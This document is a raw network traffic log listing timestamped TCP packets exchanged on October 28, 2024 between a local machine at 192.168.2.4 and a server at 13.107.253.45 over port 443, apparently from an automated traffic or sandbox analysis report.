                                                                                                                                                                            Oct 28, 2024 19:12:29.245235920 CET4434981213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:29.245270014 CET49812443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:29.245286942 CET4434981213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:29.248332977 CET49817443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:29.248420954 CET4434981713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:29.248528957 CET49817443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:29.248711109 CET49817443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:29.248769045 CET4434981713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:29.263561964 CET4434981313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:29.263631105 CET4434981313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:29.263683081 CET49813443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:29.263865948 CET49813443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:29.263886929 CET4434981313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:29.263899088 CET49813443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:29.263904095 CET4434981313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:29.266614914 CET49818443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:29.266649008 CET4434981813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:29.266757011 CET49818443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:29.266906023 CET49818443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:29.266920090 CET4434981813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:29.339510918 CET4434981513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:29.340027094 CET49815443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:29.340048075 CET4434981513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:29.340497971 CET49815443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:29.340502024 CET4434981513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:29.422641993 CET4434981413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:29.422805071 CET4434981413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:29.422894001 CET49814443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:29.422982931 CET49814443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:29.422982931 CET49814443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:29.423029900 CET4434981413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:29.423058987 CET4434981413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:29.425734043 CET49819443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:29.425802946 CET4434981913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:29.425916910 CET49819443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:29.426067114 CET49819443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:29.426112890 CET4434981913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:29.476345062 CET4434981513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:29.476588964 CET4434981513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:29.476636887 CET49815443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:29.476864100 CET49815443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:29.476895094 CET4434981513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:29.476907015 CET49815443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:29.476912975 CET4434981513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:29.480122089 CET49820443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:29.480163097 CET4434982013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:29.480238914 CET49820443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:29.480417967 CET49820443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:29.480436087 CET4434982013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:29.781092882 CET4434981613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:29.781734943 CET49816443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:29.781764984 CET4434981613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:29.782268047 CET49816443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:29.782283068 CET4434981613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:29.918432951 CET4434981613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:29.918665886 CET4434981613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:29.918736935 CET49816443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:29.918802977 CET49816443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:29.918836117 CET4434981613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:29.918872118 CET49816443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:29.918885946 CET4434981613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:29.922197104 CET49821443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:29.922240973 CET4434982113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:29.922316074 CET49821443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:29.922475100 CET49821443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:29.922492981 CET4434982113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:30.046304941 CET4434981713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:30.046895027 CET49817443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:30.046937943 CET4434981713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:30.047430038 CET49817443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:30.047446012 CET4434981713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:30.048336029 CET4434981813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:30.048744917 CET49818443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:30.048768044 CET4434981813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:30.049187899 CET49818443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:30.049200058 CET4434981813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:30.178826094 CET4434981913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:30.179392099 CET49819443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:30.179414034 CET4434981913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:30.179913044 CET49819443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:30.179924011 CET4434981913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:30.187208891 CET4434981713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:30.187428951 CET4434981713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:30.187542915 CET49817443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:30.187613010 CET49817443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:30.187649012 CET4434981713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:30.187675953 CET49817443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:30.187707901 CET4434981713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:30.189410925 CET4434981813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:30.189485073 CET4434981813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:30.189551115 CET49818443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:30.189629078 CET49818443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:30.189657927 CET4434981813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:30.189686060 CET49818443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:30.189698935 CET4434981813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:30.190788031 CET49822443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:30.190841913 CET4434982213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:30.190920115 CET49822443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:30.191050053 CET49822443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:30.191063881 CET4434982213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:30.191900015 CET49823443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:30.191935062 CET4434982313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:30.192008972 CET49823443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:30.192101955 CET49823443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:30.192116022 CET4434982313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:30.247658014 CET4434982013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:30.248058081 CET49820443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:30.248080969 CET4434982013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:30.248526096 CET49820443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:30.248532057 CET4434982013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:30.317408085 CET4434981913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:30.317631960 CET4434981913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:30.317704916 CET49819443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:30.317764044 CET49819443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:30.317799091 CET4434981913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:30.317826986 CET49819443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:30.317861080 CET4434981913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:30.320702076 CET49824443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:30.320811987 CET4434982413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:30.320911884 CET49824443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:30.321074963 CET49824443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:30.321111917 CET4434982413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:30.388935089 CET4434982013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:30.389097929 CET4434982013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:30.389168024 CET49820443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:30.389246941 CET49820443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:30.389271975 CET4434982013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:30.389286995 CET49820443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:30.389293909 CET4434982013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:30.391906023 CET49825443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:30.391935110 CET4434982513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:30.392008066 CET49825443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:30.392147064 CET49825443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:30.392167091 CET4434982513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:30.685755968 CET4434982113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:30.686321974 CET49821443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:30.686338902 CET4434982113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:30.686813116 CET49821443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:30.686820030 CET4434982113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:30.823875904 CET4434982113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:30.826936960 CET4434982113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:30.827032089 CET49821443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:30.827069044 CET49821443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:30.827080965 CET4434982113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:30.827094078 CET49821443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:30.827100039 CET4434982113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:30.830118895 CET49826443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:30.830219030 CET4434982613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:30.830295086 CET49826443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:30.830485106 CET49826443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:30.830533981 CET4434982613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:30.975387096 CET4434982213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:30.976407051 CET49822443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:30.976444960 CET4434982213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:30.976855040 CET49822443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:30.976862907 CET4434982213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:31.002727032 CET4434982313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:31.003249884 CET49823443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:31.003268003 CET4434982313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:31.003674030 CET49823443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:31.003679991 CET4434982313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:31.099303961 CET4434982413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:31.099859953 CET49824443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:31.099893093 CET4434982413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:31.100269079 CET49824443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:31.100275040 CET4434982413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:31.114733934 CET4434982213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:31.115030050 CET4434982213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:31.115098953 CET49822443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:31.115149975 CET49822443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:31.115150928 CET49822443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:31.115173101 CET4434982213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:31.115185022 CET4434982213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:31.118012905 CET49827443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:31.118057013 CET4434982713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:31.118138075 CET49827443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:31.118288994 CET49827443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:31.118302107 CET4434982713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:31.149017096 CET4434982313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:31.149143934 CET4434982313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:31.149337053 CET49823443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:31.149369955 CET49823443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:31.149369955 CET49823443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:31.149384022 CET4434982313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:31.149394989 CET4434982313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:31.151722908 CET49828443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:31.151822090 CET4434982813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:31.151896954 CET49828443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:31.152200937 CET49828443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:31.152228117 CET4434982813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:31.158468962 CET4434982513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:31.158989906 CET49825443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:31.158998966 CET4434982513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:31.159369946 CET49825443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:31.159374952 CET4434982513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:31.239058971 CET4434982413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:31.239154100 CET4434982413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:31.239253044 CET49824443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:31.239635944 CET49824443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:31.239635944 CET49824443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:31.239705086 CET4434982413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:31.239741087 CET4434982413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:31.242963076 CET49829443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:31.243002892 CET4434982913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:31.243108988 CET49829443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:31.243324995 CET49829443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:31.243335962 CET4434982913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:31.297673941 CET4434982513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:31.297749996 CET4434982513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:31.297889948 CET49825443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:31.297995090 CET49825443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:31.298012018 CET4434982513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:31.298022032 CET49825443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:31.298027992 CET4434982513.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:31.301131010 CET49830443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:31.301218987 CET4434983013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:31.301322937 CET49830443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:31.301487923 CET49830443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:31.301525116 CET4434983013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:31.594683886 CET4434982613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:31.595297098 CET49826443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:31.595370054 CET4434982613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:31.595915079 CET49826443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:31.595928907 CET4434982613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:31.733311892 CET4434982613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:31.733462095 CET4434982613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:31.733553886 CET49826443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:31.733704090 CET49826443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:31.733741045 CET4434982613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:31.733771086 CET49826443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:31.733787060 CET4434982613.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:31.737256050 CET49831443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:31.737296104 CET4434983113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:31.737360001 CET49831443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:31.737566948 CET49831443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:31.737586975 CET4434983113.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:32.087603092 CET4434982813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:32.088428974 CET49828443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:32.088454962 CET4434982813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:32.088916063 CET49828443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:32.088923931 CET4434982813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:32.091845989 CET4434982713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:32.092236996 CET49827443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:32.092250109 CET4434982713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:32.092606068 CET49827443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:32.092609882 CET4434982713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:32.224145889 CET4434983013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:32.224911928 CET49830443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:32.224944115 CET4434983013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:32.225374937 CET49830443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:32.225384951 CET4434983013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:32.226200104 CET4434982913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:32.226667881 CET49829443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:32.226701975 CET4434982913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:32.227247000 CET49829443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:32.227264881 CET4434982913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:32.229413033 CET4434982813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:32.229599953 CET4434982713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:32.229609966 CET4434982813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:32.229693890 CET49828443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:32.229792118 CET4434982713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:32.229862928 CET49827443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:32.243952036 CET49828443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:32.243988991 CET4434982813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:32.244007111 CET49828443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:32.244014978 CET4434982813.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:32.245208979 CET49827443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:32.245229006 CET4434982713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:32.245243073 CET49827443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:32.245249033 CET4434982713.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:32.250247002 CET49832443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:32.250282049 CET4434983213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:32.250365973 CET49832443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:32.250838041 CET49832443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:32.250854969 CET4434983213.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:32.251635075 CET49833443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:32.251681089 CET4434983313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:32.251753092 CET49833443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:32.251909971 CET49833443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:32.251925945 CET4434983313.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:32.371743917 CET4434983013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:32.372199059 CET4434983013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:32.372253895 CET49830443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:32.372287035 CET49830443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:32.372303009 CET4434983013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:32.372317076 CET49830443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:32.372323990 CET4434983013.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:32.374430895 CET4434982913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:32.374524117 CET4434982913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:32.374588966 CET49829443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:32.375221014 CET49834443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:32.375245094 CET4434983413.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:32.375303984 CET49834443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:32.375390053 CET49829443192.168.2.413.107.253.45
                                                                                                                                                                            Oct 28, 2024 19:12:32.375411034 CET4434982913.107.253.45192.168.2.4
                                                                                                                                                                            Oct 28, 2024 19:12:32.375427008 CET49829443192.168.2.413.107.253.45
